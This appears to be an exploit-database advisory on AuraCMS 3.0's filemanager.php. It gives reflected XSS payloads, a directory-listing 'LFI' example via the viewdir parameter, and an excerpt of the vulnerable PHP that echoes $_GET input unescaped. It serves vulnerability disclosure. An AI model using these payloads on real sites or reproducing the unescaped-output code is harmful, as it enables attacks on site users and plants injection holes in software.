AuraCMS 3.0 - Multiple Vulnerabilities

ID 1337DAY-ID-22303
Type zdt
Reporter Mustafa ALTINKAYN
Modified 2014-06-01T00:00:00


Exploit for php platform in category web applications

                                            # Exploit Title: AuraCMS 3.0 Multiple Vulnerabilities
# Date: 05/28/2014
# Author: Mustafa ALTINKAYNAK
# Download URL :
# Software Link:
# Vuln Category: CWE-79 (XSS) - CWE-98 (LFI)
# Tested on: AuraCMS 3.0
# Tested Local Platform : XAMP on Windows 8
# Patch/ Fix: Not published.
Technical Details
1) Reflected XSS : FileManager is a parameter unfiltered view of the file. 
Ex: filemanager.php?viewdir="><script>alert('Mustafa');</script>
2) LFI (Local File Include) : Directory listing is done. 
Ex : filemanager.php?viewdir=/home
# filemanager.php (Between 263,311 line)
Example :
280 line : <input type="hidden" value="<?php echo $_GET['viewdir']; ?>" name="return" />
Example 2 :"><script>alert("mustafa");</script>
<input type="hidden" value="<script>alert("mustafa");</script>" name="return" />
Example 3 :<script>alert("mustafa");</script>
<input type="hidden" value=" "><script>alert("mustafa");</script>" name="return" /> Bingooo :)
if(isset($_GET['viewdir'])) {
        <ul id="browser-toolbar">
            <li class="file-new"><a href="#" title="<?php echo $lng['new_file_title']; ?>" onclick="toggle_visibility('load-file'); return false;"><?php echo $lng['new_file']; ?></a></li>
            <li class="folder-new"><a href="#" title="<?php echo $lng['new_folder_title']; ?>" onclick="create_folder('<?php echo $_GET['viewdir']; ?>'); return false;"><?php echo $lng['new_folder']; ?></a></li>
            <li class="folder-delete"><a href="#" title="<?php echo $lng['delete_folder_title']; ?>" onclick="delete_folder('<?php echo $_GET['viewdir']; ?>');"><?php echo $lng['delete_folder']; ?></a></li>
            <li class="file-refresh"><a href="#" title="<?php echo $lng['refresh_files_title']; ?>" onclick="load('filemanager.php?viewdir=<?php echo $_GET['viewdir']; ?>','view-files'); return false;"><?php echo $lng['refresh']; ?></a></li>
        <div id="current-loction">
          <?php echo htmlspecialchars($root_path . '/' . $_GET['viewdir'] . '/'); ?>
        <form style="display: none;" id="load-file" action="" class="load-file" method="post" enctype="multipart/form-data">
              <legend><?php echo $lng['new_file_title']; ?></legend>
                <input type="hidden" value="<?php echo $_GET['viewdir']; ?>" name="return" />
                <label><?php echo $lng['form_file']; ?><input type="file" name="new_file" /></label>
              <legend><?php echo $lng['new_file_manipulations']; ?></legend>
                        <td><label for="new_resize"><?php echo $lng['form_width']; ?></label></td>
                        <td><input type="text" class="number" maxlength="4" id="new_resize" name="new_resize" value="" /> px</td>
                        <td><label for="new_rotate"><?php echo $lng['form_rotate']; ?></label></td>
                            <select id="new_rotate" name="new_rotate">
                              <option value="0"></option>
                              <option value="90">90</option>
                              <option value="180">180</option>
                              <option value="270">270</option>
                        <td><input type="checkbox" class="checkbox" id="new_greyscale" name="new_greyscale" /><label for="new_greyscale"><?php echo $lng['form_greyscale']; ?></label></td>
            <input type="submit" id="insert" value="<?php echo $lng['form_submit']; ?>" />
<?php } ?>

# [2018-01-04]  #